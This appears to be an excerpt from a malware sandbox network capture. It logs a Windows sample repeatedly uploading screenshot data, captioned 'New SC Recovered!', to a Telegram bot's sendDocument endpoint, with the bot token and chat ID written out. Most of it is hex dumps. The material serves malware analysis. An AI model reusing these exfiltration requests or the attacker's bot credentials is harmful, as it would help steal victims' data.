                                                2024-05-17 23:38:58 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:58 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 66 65 30 64 35 32 31 37 63 34 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcb1fe0d5217c4--
                                                2024-05-17 23:38:58 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:59 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:59 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.449750149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:39:05 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb801a5c9ddf4
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:05 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 38 30 31 61 35 63 39 64 64 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 38 30 31 61 35 63 39 64 64 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 30 38 2f 32 30 32 34 20 32 33 3a 31 37 3a 31 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcb801a5c9ddf4Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcb801a5c9ddf4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/08/2024 23:17:19User
                                                2024-05-17 23:39:05 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:39:05 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:39:05 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:39:05 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:39:05 UTC1414OUTData Raw: 00 10 f4 a0 0f 9f 68 a2 8a d4 c0 db d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 a3 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b1 29 28 b0 5c 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da
                                                Data Ascii: h<I=.m`rS$?`;ucO)(\(`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;
                                                2024-05-17 23:39:05 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 38 30 31 61 35 63 39 64 64 66 34 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcb801a5c9ddf4--
                                                2024-05-17 23:39:06 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:39:06 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:06 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.449751149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:39:23 UTC238OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcbf5819b9d90c
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                2024-05-17 23:39:23 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 35 38 31 39 62 39 64 39 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 35 38 31 39 62 39 64 39 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 38 2f 32 30 32 34 20 30 37 3a 32 33 3a 34 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcbf5819b9d90cContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcbf5819b9d90cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/18/2024 07:23:42User
                                                2024-05-17 23:39:23 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:39:23 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:39:23 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:39:23 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:39:23 UTC1414OUTData Raw: 00 10 f4 a0 0f 9f 68 a2 8a d4 c0 db d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 a3 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b1 29 28 b0 5c 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da
                                                Data Ascii: h<I=.m`rS$?`;ucO)(\(`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;
                                                2024-05-17 23:39:23 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 35 38 31 39 62 39 64 39 30 63 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcbf5819b9d90c--
                                                2024-05-17 23:39:23 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:39:24 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:23 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.449752149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:39:28 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc29e30c1ac2f
                                                Host: api.telegram.org
                                                Content-Length: 71967
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:29 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 32 39 65 33 30 63 31 61 63 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 32 39 65 33 30 63 31 61 63 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 32 2f 32 30 32 34 20 31 31 3a 30 32 3a 35 37 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc29e30c1ac2fContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcc29e30c1ac2fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/22/2024 11:02:57User
                                                2024-05-17 23:39:29 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:39:29 UTC16355OUTData Raw: 5a 43 cd 49 e2 15 a5 92 d1 a4 6b 4f b7 4a 0f d9 4a 63 cb 5f 24 4c 4f 98 1b cc df eb 85 fb bd a9 6d ee bc c6 d3 e4 5f b1 7f 67 96 83 cc 2e 63 f3 03 64 79 9b f3 f3 63 39 ff 00 67 18 a9 7c 98 f6 91 b0 60 d3 7e cb 07 fc f3 15 c0 b0 92 4e ea 47 a6 f1 d1 6a ce 3b 11 58 5f c9 30 59 36 69 e8 7e d6 45 c8 98 46 b8 80 01 b7 60 3d 7f 8b ee fc d9 c7 b5 36 d6 f1 45 85 94 99 b3 36 a9 05 c7 9c 24 64 33 a9 df 21 8d 40 27 70 3c 8f bb eb cf 18 a9 cd b4 07 19 8d 78 a4 fb 25 bf fc f2 5a 97 82 93 fb 46 ab 31 82 fb 03 e2 d4 20 82 0d 3a 46 96 d4 ba 5c db 37 9b ba 22 c5 4e 7c cc a0 5d cb b7 38 cb 12 72 32 31 4c b6 33 13 29 9c c4 64 2e 72 61 d9 b3 db 1b 3e 5f ca 8f b2 5b e7 3e 4a d4 a8 8a 83 0a 30 2b 6a 38 79 42 7c ed dc e7 c4 62 e3 56 9a a7 18 db 61 68 a2 8a eb 38 02 8a 28 a0 02
                                                Data Ascii: ZCIkOJJc_$LOm_g.cdyc9g|`~NGj;X_0Y6i~EF`=6E6$d3!@'p<x%ZF1 :F\7"N|]8r21L3)d.ra>_[>J0+j8yB|bVah8(
